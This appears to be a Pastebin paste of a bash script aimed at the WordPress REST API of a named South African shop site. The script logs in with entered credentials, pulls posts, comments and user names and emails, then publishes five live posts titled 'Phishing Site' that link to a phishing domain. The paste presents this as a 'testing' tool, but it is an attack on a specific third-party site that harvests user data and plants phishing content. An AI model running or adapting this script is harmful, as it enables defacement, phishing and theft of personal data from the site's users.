API tools faq
paste
WhosYourDaddySec

Nkomo

WhosYourDaddySec
Sep 26th, 2024
45
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.29 KB | None | 0 0
raw download clone embed print report
  1. #!/bin/bash
  2.  
  3. # Required Libraries
  4. command -v jq >/dev/null 2>&1 || { echo >&2 "jq is required but it's not installed. Aborting."; exit 1; }
  5. command -v curl >/dev/null 2>&1 || { echo >&2 "curl is required but it's not installed. Aborting."; exit 1; }
  6.  
  7. # Constants
  8. ENDPOINT="https://www.shop2shop.co.za/wp-json/wp/v2/"
  9. AUTH_URL="https://www.shop2shop.co.za/wp-json/jwt-auth/v1/token"
  10. LOG_FILE="wp_api_tool.log"
  11.  
  12. # Function to log messages
  13. log_message() {
  14. local message="$1"
  15. echo "$(date '+%Y-%m-%d %H:%M:%S') - $message" >> "$LOG_FILE"
  16. }
  17.  
  18. # Function to get user credentials
  19. get_credentials() {
  20. read -p "Enter your WordPress username: " USERNAME
  21. read -sp "Enter your WordPress password: " PASSWORD
  22. echo
  23. }
  24.  
  25. # Function to perform a curl request and check the response
  26. fetch_json() {
  27. local method="$1"
  28. local url="$2"
  29. local data="$3"
  30.  
  31. RESPONSE=$(curl -s -X "$method" "$url" -H 'Content-Type: application/json' -H "Authorization: Bearer $TOKEN" -d "$data")
  32. RESPONSE_CODE=$?
  33.  
  34. if [[ "$RESPONSE_CODE" -ne 200 && "$RESPONSE_CODE" -ne 201 ]]; then
  35. log_message "Error: Received status code $RESPONSE_CODE for URL $url"
  36. log_message "Response: $RESPONSE"
  37. echo "Error: Received status code $RESPONSE_CODE. Check the log for details."
  38. exit 1
  39. fi
  40.  
  41. echo "$RESPONSE"
  42. }
  43.  
  44. # Function to get JWT token
  45. get_token() {
  46. TOKEN_RESPONSE=$(curl -s -X POST "$AUTH_URL" -d "{\"username\":\"$USERNAME\", \"password\":\"$PASSWORD\"}" -H 'Content-Type: application/json')
  47.  
  48. TOKEN=$(echo "$TOKEN_RESPONSE" | jq -r '.token // empty')
  49.  
  50. if [[ -z "$TOKEN" ]]; then
  51. log_message "Error: Failed to obtain token."
  52. log_message "Response: $TOKEN_RESPONSE"
  53. echo "Error: Failed to obtain token. Check the log for details."
  54. exit 1
  55. fi
  56.  
  57. log_message "Token obtained successfully."
  58. }
  59.  
  60. # Function to decode JWT and log claims
  61. decode_jwt() {
  62. local jwt="$1"
  63. local header=$(echo "$jwt" | cut -d '.' -f1 | base64 --decode 2>/dev/null)
  64. local payload=$(echo "$jwt" | cut -d '.' -f2 | base64 --decode 2>/dev/null)
  65.  
  66. log_message "JWT Header: $header"
  67. log_message "JWT Payload: $payload"
  68. }
  69.  
  70. # Function to extract and display posts
  71. extract_posts() {
  72. POSTS=$(fetch_json GET "$ENDPOINT/posts" "")
  73.  
  74. for POST in $(echo "$POSTS" | jq -c '.[]'); do
  75. POST_ID=$(echo "$POST" | jq -r '.id')
  76. POST_TITLE=$(echo "$POST" | jq -r '.title.rendered')
  77. POST_DATE=$(echo "$POST" | jq -r '.date')
  78.  
  79. echo "Post ID: $POST_ID"
  80. echo "Title: $POST_TITLE"
  81. echo "Date: $POST_DATE"
  82.  
  83. fetch_comments "$POST_ID"
  84. done
  85. }
  86.  
  87. # Function to fetch and display comments for a specific post
  88. fetch_comments() {
  89. local POST_ID=$1
  90. COMMENTS=$(fetch_json GET "$ENDPOINT/comments?post=$POST_ID" "")
  91.  
  92. if [[ "$(echo "$COMMENTS" | jq '. | length')" -eq 0 ]]; then
  93. echo "No comments found for Post ID: $POST_ID."
  94. return
  95. fi
  96.  
  97. for COMMENT in $(echo "$COMMENTS" | jq -c '.[]'); do
  98. COMMENT_ID=$(echo "$COMMENT" | jq -r '.id')
  99. COMMENT_AUTHOR=$(echo "$COMMENT" | jq -r '.author_name')
  100. COMMENT_CONTENT=$(echo "$COMMENT" | jq -r '.content.rendered')
  101.  
  102. echo "Comment ID: $COMMENT_ID"
  103. echo "Author: $COMMENT_AUTHOR"
  104. echo "Content: $COMMENT_CONTENT"
  105. done
  106. }
  107.  
  108. # Function to extract and display users
  109. extract_users() {
  110. USERS=$(fetch_json GET "$ENDPOINT/users" "")
  111.  
  112. for USER in $(echo "$USERS" | jq -c '.[]'); do
  113. USER_ID=$(echo "$USER" | jq -r '.id')
  114. USER_NAME=$(echo "$USER" | jq -r '.name')
  115. USER_EMAIL=$(echo "$USER" | jq -r '.email')
  116.  
  117. echo "User ID: $USER_ID"
  118. echo "Name: $USER_NAME"
  119. echo "Email: $USER_EMAIL"
  120. done
  121. }
  122.  
  123. # Function to create phishing posts for testing
  124. create_phishing_posts() {
  125. for i in {1..5}; do
  126. POST_DATA=$(fetch_json POST "$ENDPOINT/posts" "{\"title\": \"Phishing Site $i\", \"content\": \"<a href='http://phishing-site.com'>Click Here</a>\", \"status\": \"publish\"}")
  127. echo "Created Phishing Post ID: $(echo "$POST_DATA" | jq -r '.id')"
  128. done
  129. }
  130.  
  131. # Main execution starts here
  132. echo "Starting WordPress API automation tool..."
  133. log_message "Script execution started."
  134.  
  135. get_credentials
  136. get_token
  137. decode_jwt "$TOKEN"
  138.  
  139. extract_posts
  140. extract_users
  141. create_phishing_posts
  142.  
  143. echo "Script execution completed."
  144. log_message "Script execution completed."
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!